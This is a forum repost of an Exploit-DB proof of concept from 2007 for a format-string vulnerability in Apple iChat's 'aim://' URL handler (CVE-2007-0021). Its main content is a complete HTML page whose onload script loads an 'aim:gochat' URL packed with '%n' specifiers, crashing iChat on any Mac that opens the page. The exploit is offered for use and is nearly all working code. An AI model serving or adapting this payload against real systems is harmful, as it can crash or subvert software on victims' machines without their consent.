Exploit Apple iChat 3.1.6 441 - 'aim://' URL Handler Format String (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3166
Проверка EDB
  1. Пройдено
Автор
MOAB
Тип уязвимости
DOS
Платформа
OSX
CVE
cve-2007-0021
Дата публикации
2007-01-21
HTML:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
	"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
	<head>
		<title>MOAB-20-01-2007</title>
		<script>
			function boom() {
				var str = '';
				for (var i = 0; i < 20; i++) {
				    str = str + escape('A%n');
				}
				str = 'aim:gochat?roomname=' + str;
				window.location = str;
			}
		</script>
	</head>
	<body onload="boom()">
	</body>
</html>

# milw0rm.com [2007-01-21]
 
Источник
www.exploit-db.com

Похожие темы